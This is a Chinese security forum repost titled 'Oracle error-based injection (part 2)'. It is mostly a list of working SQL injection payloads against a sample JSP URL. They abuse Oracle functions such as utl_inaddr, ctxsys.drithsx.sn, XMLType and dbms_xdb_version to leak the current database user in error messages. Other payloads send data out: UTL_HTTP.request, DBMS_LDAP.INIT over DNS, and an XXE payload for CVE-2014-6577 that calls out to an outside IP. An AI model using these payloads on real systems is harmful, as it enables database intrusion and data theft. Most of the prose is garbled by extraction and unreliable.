[20842] 2017-08-06_ORACLE报错注入(二)

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2017-08-06_ORACLE报错注入(二) O R A C L E ( L e m o n S e c   2 0 1 7 - 0 8 - 0 6 O R A C L E o r a c l e 使 0 x 1   u t l _ i n a d d r . g e t _ h o s t _ n a m e O r a c l e   8 g 9 g 1 0 g O r a c l e   1 1 g 访 1 1 g 使 访 h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   1 = u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   u s e r   f r o m   d u a l ) ) - - 0 x 2   c t x s y s . d r i t h s x . s n h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   1 = c t x s y s . d r i t h s x . s n ( 1 , ( s e l e c t   u s e r   f r o m   d u a l ) ) - - 0 x 3   X M L T y p e 使 X M L T y p e c h r ( 6 0 ) a s c i i 6 0 : < , 5 8 : : , 6 2 : > , a p i x m l t y p e < > : r e p l a c e h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   u p p e r ( X M L T y p e ( c h r ( 6 0 ) | | c h r ( 5 8 ) | | ( s e l e c t   u s e r   f r o m   d u a l ) | | c h r ( 6 2 ) ) )   f r o m   d u a l )   i s   n o t   n u l l - - 0 x 4   d b m s _ x d b _ v e r s i o n . c h e c k i n h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   d b m s _ x d b _ v e r s i o n . c h e c k i n ( ( s e l e c t   u s e r   f r o m   d u a l ) )   f r o m   d u a l )   i s   n o t   n u l l - - 0 x 5   d b m s _ x d b _ v e r s i o n . m a k e v e r s i o n e d h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   d b m s _ x d b _ v e r s i o n . m a k e v e r s i o n e d ( ( s e l e c t   u s e r   f r o m   d u a l ) )   f r o m   d u a l )   i s   n o t   n u l l - - 0 x 6   d b m s _ x d b _ v e r s i o n . u n c h e c k o u t h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   d b m s _ x d b _ v e r s i o n . u n c h e c k o u t ( ( s e l e c t   u s e r   f r o m   d u a l ) )   f r o m   d u a l )   i s   n o t   n u l l - - 0 x 7   d b m s _ u t i l i t y . s q l i d _ t o _ s q l h a s h h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( S E L E C T   d b m s _ u t i l i t y . s q l i d _ t o _ s q l h a s h ( ( s e l e c t   u s e r   f r o m   d u a l ) )   f r o m   d u a l )   i s   n o t   n u l l - - U T L _ H T T P . r e q u e s t 使 u t l _ h t t p . r e q u e s t 使 u t l _ h t t p 访 U T L _ I N A D D R . G E T _ H O S T _ A D D R E S S & S Y S . D B M S _ L D A P . I N I T D N S
h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( U T L _ H T T P . r e q u e s t ( ' h t t p : / / w w w . i s w i n . o r g : 8 0 / ' | | ( s e l e c t   b a n n e r   f r o m   s y s . v _ $ v e r s i o n   w h e r e   r o w n u m = 1 ) ) = 1   h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   S Y S . D B M S _ L D A P . I N I T ( ( s e l e c t   u s e r   f r o m   d u a l ) | | ' . i s w i n . o r g ' )   f r o m   d u a l ) i s   n o t   n u l l - - O r a c l e   X X E ( C V E - 2 0 1 4 - 6 5 7 7 ) 1 1 . 2 . 0 . 3 ,   1 1 . 2 . 0 . 4 ,   1 2 . 1 . 0 . 1   1 2 . 1 . 0 . 2 O r a c l e X X E U T L _ h t t p e x t r a c t v a l u e ( ) 使 U T L _ h t t p 访 h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   e x t r a c t v a l u e ( x m l t y p e ( ' < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < ! D O C T Y P E   r o o t   [   < ! E N T I T Y   %   r e m o t e   S Y S T E M   " h t t p : / / 1 7 2 . 1 6 . 1 0 . 1 : 8 0 8 0 / ' | | ( S E L E C T   u s e r   f r o m   d u a l ) | | ' " >   % r e m o t e ; ] > ' ) , ' / l ' )   f r o m   d u a l )   i s   n o t   n u l l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则